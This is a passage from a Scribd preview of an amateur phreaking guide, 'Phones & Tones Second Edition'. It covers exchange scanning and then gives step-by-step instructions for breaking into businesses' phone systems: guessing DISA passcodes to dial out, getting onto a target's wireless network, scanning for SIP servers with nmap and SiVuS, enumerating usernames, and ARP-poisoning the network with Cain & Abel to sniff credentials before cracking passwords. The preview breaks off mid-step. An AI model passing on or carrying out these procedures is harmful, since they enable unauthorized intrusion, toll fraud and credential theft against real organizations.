Welcome to Scribd. Sign in or start your free trial to enjoy unlimited e-books, audiobooks & documents.Find out more
Standard view
Full view
of .
Look up keyword
Like this
0 of .
Results for:
No results containing your search query
P. 1
Phones & Tones Second Edition

Phones & Tones Second Edition

|Views: 381|Likes:
Published by Murder Mouse
the updated beginner's guide to phreaking in today's world
the updated beginner's guide to phreaking in today's world

More info:

Published by: Murder Mouse on Jan 05, 2010
Copyright:Attribution Non-commercial


Read on Scribd mobile: iPhone, iPad and Android.
download as PDF, TXT or read online from Scribd
See more
See less





Section 1: The Introduction
----------------------------Greets and meets. Well it's definitely been a while since my last tutorial and with a new decade upon us now is as greata time as ever for a much needed update. Phreaking has definitely seen some changes since I wrote the original release.Joybubbles is gone, voip is now the standard for almost any PBX, and in most cities in the US payphones are just amemory. In fact as I'm writing this the FCC is already debating on how to convert the entire PSTN to voip. As decadescome and go the landscape of telephony is constantly changing, and with it so does phreaking. Whether the calls arecarried through tandems or routers (technically on landline it's both) the drive to explore and understand this landscapewill always keep phreakers going. So it's in this spirit that I write this guide.One thing I'd like to point out before I get started is that I have decided to write this a little differently than my originalrelease. I've stripped away much of the technical details in favor of keeping the guide as simple and straight forward aspossible. However this means that I'm writing this guide with the assumption that you the reader already have at leasta basic understanding of telecommunications. I've included some links and suggestions around the end of this guide andI'd suggest you check through them if you need to. So with all that said, lets begin.Section 2: Exchange Scanning-----------------------------Well as before lets start this discussion off with an explanation of exchange scanning. Exchange scanning for those of you who don't know is simply picking up the phone and dialing down a range of phone numbers to see what you come upwith. This is how you will find all those interesting numbers you can fuck with and share (voicemail systems, testnumbers, ANACs, strange recordings, etc). So how do you get started? Well an exchange, also known as the NXX, arethe middle three numbers in any phone number (i.e 555-xxx-1337). Most people when they first really get started scantheir own exchange, usually starting with the low end of the exchange (i.e NPA-NXX-00xx, NPA meaning the area code).So you would start off dialing NPA-NXX-0000, write down what you hear, then move on to 0001, 0002, and so on and soforth. If you're the paranoid type you might want to randomize your call sequence in order to make it slightly lessobvious what you've been up to. As in go from 0000, to 0021, to 0076, to 0014, etc until you've scanned the first 100numbers on the exchange. This of course is entirely up to you, and at least in the United States exchange scanning islegal in most areas (I think I remember reading about a law in Conneticut concerning this but I'm not really sure onthat). So anyways when scanning you will probably want to make a list for yourself of the results for later review or toshare. It's best to make some legends (acronyms) for yourself in order to abbreviate some of the most common findswhile you're scanning. Provided below is the list I use for all of mine, which is partly based on the standard proposed onbinrev a couple years back..CC- Cannot be completedCR - Cannot be reached from your calling areaNS - Not in ServiceD - DisconnectedCB - All circuits busyRO - ReorderB - BusyFX - Fax machineR - Rings
HELO - Hello?VM - VoicemailVMS - Voicemail SystemOf course you're free to use whatever legends you like, but just be sure you leave a list of them at the top of yourexchange scans if you plan on sharing them with anyone. If you need some examples to go on you can check out someof Information Leak's exchange scans below...www.informationleak.org/viewforum.php?f=43Anyways it's best to scan during different times of the day depending on what kind of exchange scan you are doing. Forlocal exchange scans or any scans that involve the probability of hitting a lot of residential lines it's best to scananywhere from mid-morning to mid-afternoon if you can. This is because most people will be up and out of the house(work, school, whatever). Of course any time that doesn't involve interrupting peoples' much needed sleep will work justfine. On the other hand if you're doing a toll free scan (1-800, 866, etc) or scanning a range assigned to a specific PBX(more on this later) then you'll want to scan in the middle of the night (after business hours).So with all that said I'll close this section as I did last time by helping you identify some of the sounds you'll be comingacross while scanning..Fax Machines - No need to tell you what a fax machine is, but you'll come across many of them while scanning and beingable to pick out their tones can be important. Most fax machines you'll come across will have a modem sound (like thesound a modem makes when using dialup), but with a slightly flatter sounding series of tones. It's kind of hard todescribe, but once you hear it it's easy to notice. Of course some other fax machines have completely different tones.Some have a low pulsing tone, and some others have a much more drawn out series of tones than most. You'll hear allof them as your scanning so it's a good idea to get familiarized with these tones early on.Milliwatt Test Numbers - These are one of the most common test numbers, and you'll be painfully aware of what theyare when you stumble across one, literally. The tone is a very loud consistant tone.ANACs - These are very common numbers to come across, but if you're not paying attention to the recordings you arestumbling across you can easily miss them. These are especially common during toll free scans due to how manybusiness recordings will read off the ANI (and in some extremely rare cases even include the ANI II identifier, feelprivileged if you manage to snag a number like this). On the other hand the ANACs that line technicians use are prettyeasy to discern since the recording will just immediately read off the ANI. All I can tell you is pay attention.DISAs - These are the administrative lines for analog PBXs and needless to say are a lot less common to come acrossthan they were just a few years ago. This like I said in the introduction is because most businesses, departments, etchave upgraded their PBXs to voip systems. If you do come across these though you will recognize them in a wide varietyof ways. Some of the older analog systems have a more low consistant tone upon connecting, but I haven't really heardthese anytime I scan. Most of the analog PBXs still up and kicking will pick up with either complete silence (meaning it'swaiting for DTMF input), or a dial tone. Of course there are some other types of systems besides DISAs that may sit andwait for DTMF, but commonly the login process is still the same irregardless.DATUs - These are one of the best finds you can come across, but I'm not really sure how common of a find they arethese days since DATUs have never really been a part of the telco here. Used to before AT&T bought the area outBellSouth was using VoiceSystems which functioned just like DATUs, but required a specific modem in order to accessthe prompt (otherwise it would just hang up as soon as you called it up). Either way these are administrative lines usedby line technicians for basic repair and tests on subscriber lines within a given exchange, and you'll recognize one as ahalf ring followed by a low tone. I'll link some information on it later in the guide.VMBs - Of course by VMBs I don't mean the individual mailboxes you'll come across when scanning PBXs and such, butspecifically the voicemail system lines for logging in and checking messages and such on the mailboxes. Just like ANACsto fish these out you have to really just pay attention to any recordings you come across. Some voicemail systems willannounce what kind of system it is as soon as you connect, while others will just go straight to asking for your user id.What to do from here will be discussed in a later section.Also once you get a handle on exchange scanning you should look into unpublished exchanges. Most of these are theexchange numbers you normally dial to reach common services (411, 911, 211, etc), but depending on the LEC there mayalso be a telco exchange used just for test numbers (like 959 in the AT&T areas). To get unpublished exchanges just goto nanpa.com and look for Central Office Code Assignments that are close to your area (remember, Utilized meansused). Compare this list to the list in your phone book, and any exchanges that aren't listed in the phone book besidesthe obvious services mentioned before can be considered special interest exchanges. Finally before I finish here I shouldmention that if handscanning seems too daunting for you and you really want to go the wardialer route (to each theirown) and you're a Linux user then I'd suggest looking into iWar. Has plenty of nifty options, including support forprotocols like IAX2. Check the link below for details..www.softwink.com/iwar/Section 3: Hacking PBXs------------------------Well now that we're done with exchange scanning we can move on to PBXs. How you will go about exploring, exploiting,fondling, or whatever you feel like doing with a PBX varies greatly depending on the kind of PBX it is, but a great placeto start either way is to do a little poking around on the phone. First crack open the phone book or go over tosueraes.com and look u an business/deartment/etc ou have in mind to see all the listed numbers for that
organization. Some of the larger businesses in your area may have a range of numbers reserved. If so you will see thatall of the listed numbers are basically the same. Say the main office line is NPA-NXX-5500, their fax line is NPA-NXX-5504, and their accounting department is NPA-NXX-5542. Then it's safe to assume that a great place to start is to scanthe NPA-NXX-55xx range. Take note of all the numbers listed and start exchange scanning down the rest to see whatyou come across. Otherwise if there isn't a range to scan try calling the main line (after business hours of course) andlisten through the recording. Sometimes the recording will go through a list of extensions for different departments thatthe caller might be inquiring about. Listening through this gives you the opportunity to figure out the extension range,which you can then scan through like you would an exchange scan. Say the main office is 10, the accounting departmentis 15, senior manager is 22, and so on and so forth then it's safe to assume that the range goes anywhere in between10-99. So just like an exchange scan you would take note of all the extensions listed, and then just keep calling backand trying all the extensions that weren't mentioned. Most of the interesting extensions that you'll come across will beat the end of the range (50, 99, 9999, wherever the extension range ends) since all the office/department lines aregoing to be assigned at the start on up. If all your after is the voicemail system (more on these later) then you can cutshort how many times you have to call back by scanning up in 10s. Say the main office line is 10, then you can start at20 and just keep going up until you find what you were looking for. Otherwise trying them all will at the very least aswould an exchange scan give you a decent idea of what kind of PBX you are dealing with. Say you hear a lot of Audixmailbox recordings, then you are dealing with an Avaya PBX (which is a very popular voip PBX). Just at the very leastlisten out for anything that could help you identify what exactly you're up against, and use google to do a little bit of homework on it. User guides, installation manuals, any of the vendor sites can give you a plethora of information thatyou can use later on (default passwords, etc).So lets say for starters that you're scanning an analog PBX and happen to come across a DISA line. Well from here youwould try guessing the passcode and seeing if you get lucky. Try combinations like 9999#, 1234#, etc and if you catch adial tone then consider yourself lucky and use it however you like (dial out, fuck around with a little, whatever). Of course a more likely scenerio when scanning is that you don't find a DISA line, but instead cop enough recordings tofigure out what kind of voip PBX you're dealing with and get all the information you need on it (Avaya, Shoretel, etc).Well then you'd pack up your laptop with a softphone like X-Lite downloaded (in case you want to dial out), get overaround the business you're targeting (during business hours), and see if there are any wireless access points you canuse. How to crack the key if it's protected is beyond the scope of this tutorial so lets just say for shits and giggles thatthere is an AP and it's unprotected. Well a good start from here would be to start scanning the network for SIP servers.The port for these is 5060 on either UDP or TCP, so in nmap you would scan for these with the following..nmap -sU -p 5060 more thorough option for Windows users is to download SiVuS and scan the network that way. SiVuS has anentire suite of tools that you can use in order to enumerate any information you can, and attempt some common hacksagainst the server (REGISTER attempts, all that good stuff). Link provided below...www.vopsecurity.orgAlso while I'm giving program suggestions I would also recommend checking out sipvicious, which is a series of pythonscripts that can be used for scanning, enumerating, and cracking SIP proxies and servers on the network.http://sipvicious.org/blog/So lets say of the three you decide to use SiVuS to scan for any weak points in the network you will first want to see if you can find any SIP servers. First go to SIP Component Discovery and in the "Target network" field enter something like192.168.1.1-254 (whatever the network range is) and then click Scan. Let this play through and see if you find any SIPservers. If you do now you can scan the SIP server for any common attacks. Just go to the SIP Scanner tab, and click onScanner Configuration. Enter the SIP server you found before and check "Probe Targets". From here you can alsoconfigure other aspects like what sort of authentication to use (most SIP servers use MD5, but cleartext still isn'tcompletely out of the question), what sort of method checks to use, security checks, log file to save, and other aspectsof the scan. Then just click over to the Scanner Control Panel tab and initiate the scan. Now what you can do from heredepends on what you come across while scanning the network, and what your SIP server scan pulled. A great place tostart if the scan didn't pull anything useful in your case is to try and grab some usernames on the server. To try this youhave two options. You can either with SiVuS manually test usernames, or use Cain & Abel to try and sniff usernamesover the network. To manually test possible usernames in SiVuS go to Utilities/Message Generator and fill out theappropriate information. For example Method to REGISTER, Called User being the user you are attempting to get aresponse from, Domain Host being the ip or hostname of the SIP server you discovered, change the To to usertotesthere<sip:usertotesthere@sipserverhere.com> and From to whatever, and change Subject and User Agent to make it lessobvious on the network what exactly you are doing. Then click start and see what sort of response you get from theserver. A 401 response means you have a valid username, and 403 means that it's an invalid username. A good schemeto use if you are somewhat familiar with the business/department you are dealing with is to try the names of employeeswho work there. For example the first name, first initial and last name, first name and last initial, etc. This is a popularscheme for a lot of places so it's definitely worth a try. Even if you aren't familiar with the place you can try to take acasual visit into the business/department and keep a mental note of any of the employee names for future reference. Of course depending on the network it can many times be a pretty hefty task trying to test any possible usernames thatway so lets get into sniffing over the network for possible usernames. For this like I said earlier we will be using Cain & Abel, which can be downloaded here..www.oxid.it/cain.htmlNow what we first have to do is establish an ARP poison route on the network. To do so open up Cain & Abel and go toConfigure. From here select your network card and click OK. From here click the + sign, and this will bring up the MACAddress Scanner. "All hosts in my subnet" should be active so just press OK. Now click the + sign again and you shouldsee a list of hosts on the network on the left side. Click on the IP of the SIP server and select all the IPs on the rightside, then just click OK. Now you can sniff all the usernames that pass over the server by looking through the To, From,and Contact fields on everything that passes through. Now from here one way or another you should have a decent listof usernames to use so now it's time to crack any of these users to get the password. From here you have two routes too with, assive and active crackin. We'll first start off with active crackin. Oen u SiVuS aain and o to

You're Reading a Free Preview

/*********** DO NOT ALTER ANYTHING BELOW THIS LINE ! ************/ var s_code=s.t();if(s_code)document.write(s_code)//-->